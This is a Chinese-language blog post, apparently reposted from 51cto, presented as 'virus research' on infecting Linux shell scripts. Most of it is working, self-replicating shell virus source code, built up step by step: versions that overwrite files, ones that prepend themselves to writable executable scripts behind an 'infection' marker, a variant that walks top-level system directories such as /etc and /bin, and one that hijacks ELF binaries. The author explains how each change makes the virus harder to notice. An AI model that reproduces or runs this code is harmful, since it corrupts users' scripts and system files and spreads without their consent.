?病毒研究之感染linux腳本?

?? 對于shell編程的程序員來說所謂的shell病毒技術就是小牛一毛而已,看完本文后你就會有所體會但,簡單歸簡單,我們還是要去了解它,呵呵.? 主要的shell病毒技術? -------------------? 當然,本文需要你至少了解linux shell編程的基礎知識和病毒知識.? 我們來看一個最原始的shell病毒,代碼最能說明問題:? 代碼:? #shellvirus I? for file in *? do? ?? cp $0 $file? done? 簡單吧?遍歷當前文件系統的所有文件,然后覆蓋所有文件.但是,我們知道linux是多用戶的操作系統,它的文件是具有保護模式的,所以以上的腳本有可能會報出一大堆的錯誤,所以它很快就會被管理員發現并制止它的傳染.所以我們可以為該腳本做個判斷,這樣隱蔽性就大大增強了:? 代碼:? #shellvirus II? for file in *? ??do? ????if test -f $file? ????then? ???? if test -x $file? ???? then? ??????if test -w $file? ??????then? ?????? if grep -s echo $file >.mmm? ?????? then? ?????? cp $0 $file? ??fi; fi; fi; fi; fi? done? rm .mmm -f? 我們改進了一下,加了若干的判斷,判斷文件是否存在,是否文件可執行,是否我們有權限寫,再判斷它是否是腳本程序。如果是就cp $0 $file,所以這段代碼是感然該系統所有的腳本程序的,危害性還是比較大的.? if grep -s echo $file>/.mmm? 這句也可以這樣寫:? if file $file | grep -s 'Bourne shell script' > /dev/nul ;? then,也就是判斷file是否為shell腳本程序.? 但是,腳本病毒一旦在感染完畢之后就什么也不做了,它沒有象二進制病毒那樣的潛伏的危害性,而且以上的腳本只是簡單的覆蓋宿主而已,所以我這里利用了一下傳統的二進制病毒的感染機制,效果也不錯,? 看看下面代碼:? #infection? head -n 24 $0 > .test????????<-取自身保存到.test? ??for file in *????????????<-遍歷文件系統? ??do? ?? if test -f $file????????<-判斷是否為文件? ?? then? ?????? if test -x $file????????<-判斷文件是否可執行? ?????? then? ????????????if test -w $file????<-判斷文件是否可寫? ????????????then? ??????????????if grep -s echo $file >.mmm????<-判斷是否為腳本程序? ??????????????then? ????????????????head -n 1 $file >.mm????????<-提取要感染的腳本程序的第一行? ????????????????if grep -s infection .mm >.mmm????<-判斷該文件是否已經被感染? ??? ????????????????then? ???????????????? rm -f .mm????????????<-已經被感染,則跳過? ????????????????else????????????????<-還未被感染? ???????????????? cat $file > .SAVEE????????<-很熟悉吧?借用了傳統的二進制文件的感染機制? ???????????????? cat .test > $file? ???????????????? cat .SAVEE >> $file? ?? fi; fi; fi; fi; fi? done? rm .test .SAVEE .mmm .mm -f? 程序的注解足以說明了,其實增加了潛伏的危害性,但還是特容易被發現,沒辦法的事情,shell腳本一般都是明文的,呵呵.不過危害性已經相當大了.這段程序用了一個感染標志:infection來判斷是否已經被感染,著在程序中可以反應出來.? 為了使上面的代碼不容易被發現,我必須優化它,最先考慮的肯定是精練代碼:? 代碼:? #infection? for file in * ;??do? ?? if test -f $file && test -x $file && test -w $file ; then? ????if grep -s echo $file > /dev/nul ; then? ???? head -n 1 $file >.mm? ??????if grep -s infection .mm > /dev/nul ; then? ?????? rm .mm -f ; else? ????????cat $file > .SAVEE? ????????head -n 13 $0 > $file? ????????cat .SAVEE >> $file? ??fi; fi; fi? done? rm .SAVEE .mm -f? 現在只有兩個臨時文件的產生了,代碼也被精簡到了13行.當然可以完全用;來把代碼甚至寫到1-2行,但這里我只是說明問題,就不寫出來了.? 好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因為大多數有用的系統配置腳本都存放在那些目錄下,只要對上述代碼稍作改動就可以實現了? 代碼:? #infection? xtemp=$pwd????????????????<-保存當前路徑? head -n 22 $0 > /.test? for dir in /* ; do????????????<-遍歷/目錄? ??if test -d $dir ; then????????<-如果是目錄就cd該目錄? ?? cd $dir? ?? for file in * ; do????????????<-遍歷該目錄文件? ????if test -f $file && test -x $file && test -w $file ; then????<-確定文件是否可執行,可寫? ???? if grep -s echo $file > /dev/nul ; then????????????<-確定是否為腳本程序??? ?????? head -n 1 $file > .mm? ?????? if grep -s infection .mm > /dev/nul ; then????????<-確定是否已經被感染? ??? ????????rm .mm -f ; else? ???????? cat $file > /.SAVEE????????????????<-和前面的感染機制一樣感染未被感染的腳本程序? ???????? cat /.test > $file? ???????? cat /.SAVEE >> $file? ????fi; fi; fi? ?? done? ?? cd ..? ??fi? done? cd $xtemp????????<-返回原目錄? rm /.test /.SAVEE .mm -f? ????其實這段代碼只感染了/目錄下的一層目錄.當然我們可以使它感染的更深,只是加幾個循環而已.同樣shell病毒可以做很多事情如download后門程序,為機器自動開后門,主動去***聯網的其他機器,取用戶的email來發送傳染等等.總之它的實現技術不高深, 但也比較實用,還是值得去說明一下的,呵呵.? ????同樣,我們也可以感染elf文件,但危害性很小,這里不重點講,給個例程大家理解一下吧? 代碼:? for file in * ;??do? ?? if test -f $file && test -x $file && test -w $file ; then? ????if file $file | grep -s 'ELF' > /dev/nul ; then? ???? mv $file .$file? ???? head -n 9 $0 > $file? ??fi; fi? done? $0

轉載于:https://blog.51cto.com/coolface/765600

總結

以上是生活随笔為你收集整理的病毒研究之感染linux脚本的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。